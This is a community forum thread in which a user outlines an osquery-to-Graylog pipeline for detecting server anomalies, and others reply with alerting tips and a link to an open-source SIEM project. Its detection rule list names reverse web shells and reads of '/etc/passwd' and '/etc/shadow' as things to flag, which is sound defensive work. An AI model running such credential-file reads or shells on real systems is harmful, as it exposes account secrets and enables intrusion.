[Security] Monitor/Detect/Alert for anomaly behaviors on the server with osqueryOsquery + Graylog

Flow:

  1. Osquery monitor and push activities log to Graylog server (cmd log, socket logs, file modify…).
  2. Graylog use Extractor, Rule, Pineline, Filter & Aggregation and Alerts to detect and control security risks

Detection Rules:

  1. SSH Login && Brute force ssh
  2. Run Reverse web shell
  3. Run anomaly commands: whoami, cat /etc/passwd, cat /etc/shadow…

hi @taibui
Maybe I didn’t get it, but I can not see a link in your post. Are you searching for stuff like this or do you have something you want to share?

2 Likes

Maybe this could help?

Sorry, I do not know what the question is.

2 Likes

@taibui

You can use a stream and filter out those logs and then create alert/notification.
Example Stream, this has not been test out but i think you get the hint.

Same with the others if you want. Chances are you will need a field or stream for those uniquic alerts.
With Windows Event Viewer you can use the field EnevetID /w 4624 for User logon session, etc…

Example:

image

2 Likes

Hi, @taibui , To post to the new Marketplace, you’ll need to include a link to your GitHub account where users can find your add-on.

1 Like

@gsmith @dscryber @ihe @StefanAustin you can see our model is here: GitHub - SOC-Community/SIEM-CoreEngine: Security information and event management (SIEM) is based on Graylog Open Source

we are building a Open Source SIEM resources from graylog platfrom

1 Like